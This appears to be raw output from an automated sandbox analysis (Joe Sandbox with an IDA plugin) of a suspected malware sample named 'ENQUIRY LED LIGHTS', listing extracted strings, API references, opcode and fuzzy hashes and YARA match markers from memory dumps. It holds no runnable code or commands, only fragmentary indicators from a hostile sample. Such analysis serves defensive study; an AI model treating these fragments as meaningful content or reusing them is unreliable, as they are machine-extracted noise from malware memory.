                                                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                  • API String ID: 0-871070163
                                                                                                  APIs
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02F8728C
                                                                                                  Strings
                                                                                                  • RTL: Resource at %p, xrefs: 02F872A3
                                                                                                  • RTL: Re-Waiting, xrefs: 02F872C1
                                                                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 02F87294
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                  • API String ID: 885266447-605551621
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ___swprintf_l
                                                                                                  • String ID: %%%u$]:%u
                                                                                                  • API String ID: 48624451-3050659472
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __aulldvrm
                                                                                                  • String ID: +$-
                                                                                                  • API String ID: 1302938615-2137968064
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $$@
                                                                                                  • API String ID: 0-1194432280
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: ?$ T$#$%$'L$(8$+$,)$7|$8$=<$>$$A$A$A;$B$L0$aQ$l$uA${e
                                                                                                  • API String ID: 0-1129630295
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 6$O$S$\$s
                                                                                                  • API String ID: 0-3854637164
                                                                                                  • Instruction ID: d37999ddd043f6eadd392f346f42d5b23dc1c1aa6823b9b44a24346f7af213e8
                                                                                                  • Opcode Fuzzy Hash: 4b9afb912764b904411f17f77d1b2b46a621f600300256f6f0bdbff6779bfef5
                                                                                                  • Instruction Fuzzy Hash: D311E2F6D1121DAF9B00DFA9D8419EFBBF9EF88210F14456AE915E7200E7709A158FA0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: bf25db738f595c1deeaf45e6cf8f23d96115af6a22cae5be23bd99193bbbd3da
                                                                                                  • Instruction ID: ce940c776d42d16f16df8cdd07b6583d285a182700b75d29171bb7699306e1f1
                                                                                                  • Opcode Fuzzy Hash: bf25db738f595c1deeaf45e6cf8f23d96115af6a22cae5be23bd99193bbbd3da
                                                                                                  • Instruction Fuzzy Hash: 5811E5B6D1121CAF9B00DFA9D8409EEB7F9EF88210F14416AE919E7200E7705A05CFA0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 39b8017c62be71a335f6390589f08bde4432edaad7a4ee143269fc650c3c38c3
                                                                                                  • Instruction ID: 1c763ef4b90c3d910ce44814b7fa0cd3ce248ffec52e018602d042830c88e062
                                                                                                  • Opcode Fuzzy Hash: 39b8017c62be71a335f6390589f08bde4432edaad7a4ee143269fc650c3c38c3
                                                                                                  • Instruction Fuzzy Hash: 680140B6A41218ABE710AAA4DC85DEB736CDF44614F100296FE28D7241FBB0BA5186E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: dca3e677e5e95d6e767de2fc9d14673199151e96ece32b3bb1ec9d68a5ebb9a9
                                                                                                  • Instruction ID: 367b4a317a0c67ab910f15721ecc8de4d04795824b4bdd56150f6ffacea9a582
                                                                                                  • Opcode Fuzzy Hash: dca3e677e5e95d6e767de2fc9d14673199151e96ece32b3bb1ec9d68a5ebb9a9
                                                                                                  • Instruction Fuzzy Hash: 6901F272610208ABEB08DBB4DCC2FEE77A8DB45710F4442A9FD18DB2C0D736F6558691
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b6b4a6b344d8da35dc86dc90d1531af1a605ee18a1239af6f182c0d79e7a83de
                                                                                                  • Instruction ID: 3e817b22757b2b8f8d74ae83071e7a10e1a655140887572027d2d73f81478c15
                                                                                                  • Opcode Fuzzy Hash: b6b4a6b344d8da35dc86dc90d1531af1a605ee18a1239af6f182c0d79e7a83de
                                                                                                  • Instruction Fuzzy Hash: 2E11C9B1D21229AF8B54CFAD99845DDBBF8FB4D721F10855BE928F7200E77096418F90
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 84e4f580c2f966e9f9b07fc989e96498ad32f0c506480f3c6e51f6e36c57b017
                                                                                                  • Instruction ID: 5fd0985b4bff09da6530a4308f482741c492f408b605d960e71454f4ac1e94f2
                                                                                                  • Opcode Fuzzy Hash: 84e4f580c2f966e9f9b07fc989e96498ad32f0c506480f3c6e51f6e36c57b017
                                                                                                  • Instruction Fuzzy Hash: 8D0180B2214508BBDB54DE99DC81EEB77ADAF8C714F508209FA09A7244D730F9518BA4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: aeabe67e95d191c17807460aaeafe0ec19abb320063cd6a4c2b2134539914ae2
                                                                                                  • Instruction ID: 64cbd3b411754d8aaa45962a0fde7c89063bb56af8413c8fb8e00c2e4438f49f
                                                                                                  • Opcode Fuzzy Hash: aeabe67e95d191c17807460aaeafe0ec19abb320063cd6a4c2b2134539914ae2
                                                                                                  • Instruction Fuzzy Hash: 1501DBF2D1121DAFCB40DFE8D9419EEBBF9AB48200F14426AD905F7240E7745A04CFA5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 53e50d2880b3af2f332f6aa196373ca2cdd4e5c4c21b40c57cd5324490a35bf4
                                                                                                  • Instruction ID: 50e354948ddc8528a0f4bd6ada5ca50d9b110eb325699e850c529f48052581d6
                                                                                                  • Opcode Fuzzy Hash: 53e50d2880b3af2f332f6aa196373ca2cdd4e5c4c21b40c57cd5324490a35bf4
                                                                                                  • Instruction Fuzzy Hash: 1BF0A773604216ABD7105AAEACC0B86F79CEBC5334F240222FD1CC7251E771F45286B0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5c2e3192aa24884ec3acbff5a2ab8b364e14beb4b86126290fddc64c50488910
                                                                                                  • Instruction ID: b2f79affd32b36d2899a2df016c10aefbc61a366be749f3e02e846d3b975f9fe
                                                                                                  • Opcode Fuzzy Hash: 5c2e3192aa24884ec3acbff5a2ab8b364e14beb4b86126290fddc64c50488910
                                                                                                  • Instruction Fuzzy Hash: 16F0FCB5C46359AFEF11EF64CC88EAA7B789F95214F0043C9E80497151DB315A46C7D0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e61af1ff2d637d5650b34679ac960791de74a5457d5976a0e18ada484b418205
                                                                                                  • Instruction ID: 83fe3e990617126a0b68c996721a1e792f27fcaf4bbf078ab540f280246545bf
                                                                                                  • Opcode Fuzzy Hash: e61af1ff2d637d5650b34679ac960791de74a5457d5976a0e18ada484b418205
                                                                                                  • Instruction Fuzzy Hash: 2EF01CB5640204BBD710EE99DC85E9B77ACEFC8714F004509F91897241D770B9518BB4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0681289463acc3cc7b52d519a9f1f540006482d51675ae265bd9054e089dee02
                                                                                                  • Instruction ID: 9a6696bdd87d1048b2424ade594c74843b1069d7b5e97a3393df05c2e24b3923
                                                                                                  • Opcode Fuzzy Hash: 0681289463acc3cc7b52d519a9f1f540006482d51675ae265bd9054e089dee02
                                                                                                  • Instruction Fuzzy Hash: 8DE092B2240304BBD614EE69EC81FAB37ACEFC9714F104419F919A7242D730B91087B4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 347d857568fb5e9bee7deb4e931ac0eb44ef0b06687ca2ccad6c420ebb46dad1
                                                                                                  • Instruction ID: dbf1836e67406ff54ee7c5c611957f38e2d32a2cdd9da1be223f6622abaabca5
                                                                                                  • Opcode Fuzzy Hash: 347d857568fb5e9bee7deb4e931ac0eb44ef0b06687ca2ccad6c420ebb46dad1
                                                                                                  • Instruction Fuzzy Hash: F4E04F33508226AB871459AE9C849C6F7DCEA9A3317251222E86C97650D631E85386E0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a9b7f4ec5b3efd2b72518faff0def773237a841f76f456650df5c183434308b4
                                                                                                  • Instruction ID: b168fb03cd37f42f4701912284b9bc38fb511791d949159aceb26bc0a688d6e5
                                                                                                  • Opcode Fuzzy Hash: a9b7f4ec5b3efd2b72518faff0def773237a841f76f456650df5c183434308b4
                                                                                                  • Instruction Fuzzy Hash: 84F08971815208EBDB14CF64D8817DDBB74EB05320F10436AE824972C0D73497558741
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: daeb31a5d26c7c7d0447e5918d7d8fec868782d96e51e471d2bd42bcc7eedab4
                                                                                                  • Instruction ID: 8d390d54aa1bd6e2231c67ad5fc873898de5b1c1d25921e0d69df21743e51e57
                                                                                                  • Opcode Fuzzy Hash: daeb31a5d26c7c7d0447e5918d7d8fec868782d96e51e471d2bd42bcc7eedab4
                                                                                                  • Instruction Fuzzy Hash: 1DE0DF32A8122877D22516899C45F9B77AC8BC5E20F140064FF189B380E661B90082E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9e20fb91b1a8b693fee14a770cdb23ca020879d64b4c1d757bc0a4b5e8bdf045
                                                                                                  • Instruction ID: da1bdbc4e3aa320b9780c2757f2f26ecd4421fd0f1b10392ffa24483440f3dd4
                                                                                                  • Opcode Fuzzy Hash: 9e20fb91b1a8b693fee14a770cdb23ca020879d64b4c1d757bc0a4b5e8bdf045
                                                                                                  • Instruction Fuzzy Hash: 09F06571915108EBDB14DF64E882ADDBB74DB09310F1047AEEC24DB280E735DB658741
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                                                                  • API String ID: 0-3248090998
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                                                                  • API String ID: 0-3248090998
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  • String ID: (-<v$(osj$(tn`$+fww$+njf$4<v:$4<v:7)0$7)0$:7)?$<q:e$>+nj$`b(p$b(fw$bew+$f`b($fi`b$fqna$fsnh$fwwk$i`+-$ibc*$k+fw$kndf$ndfs$nhi($njf`$sjk,$snhi$v:7)$wknd
                                                                                                  • API String ID: 0-1649002233
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                                                                  • API String ID: 0-1002149817
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                                                                                  • API String ID: 0-3236418099
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  • String ID: ?$ T$#$%$'L$(8$+$,)$8$=<$A$A$B$L0$aQ$l$uA${e
                                                                                                  • API String ID: 0-4261188412
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                                                  • API String ID: 0-392141074
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                                                  • API String ID: 0-392141074
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  • String ID: !9=+$'"+$+ c;$+<<7$<av`$=unw$N$`~`{$`~`~$w~~a$}|un$~`{}$~`~n
                                                                                                  • API String ID: 0-1516369116
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  • String ID: !9=+$'"+$+ c;$+<<7$<av`$=unw$N$`~`{$`~`~$w~~a$}|un$~`{}$~`~n
                                                                                                  • API String ID: 0-1516369116
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                                                  • API String ID: 0-685823316
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                                                  • API String ID: 0-685823316
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  • String ID: :$:$:$A$I$N$P$m$s$t
                                                                                                  • API String ID: 0-2304485323
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  • String ID: .$P$e$i$m$o$r$x
                                                                                                  • API String ID: 0-620024284
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: L$S$\$a$c$e$l
                                                                                                  • API String ID: 0-3322591375
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: F$P$T$f$r$x
                                                                                                  • API String ID: 0-2523166886
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: F$P$T$f$r$x
                                                                                                  • API String ID: 0-2523166886
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: )$F$[$\$v$y
                                                                                                  • API String ID: 0-3880085799
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $i$l$o$u
                                                                                                  • API String ID: 0-2051669658
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $i$l$o$u
                                                                                                  • API String ID: 0-2051669658
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $e$k$o
                                                                                                  • API String ID: 0-3624523832
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $e$h$o
                                                                                                  • API String ID: 0-3662636641
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $e$k$o
                                                                                                  • API String ID: 0-3624523832
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                                                  • API String ID: 0-2877786613
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                                                  • API String ID: 0-2877786613
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $e$h$o
                                                                                                  • API String ID: 0-3662636641
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 2$3$L$R
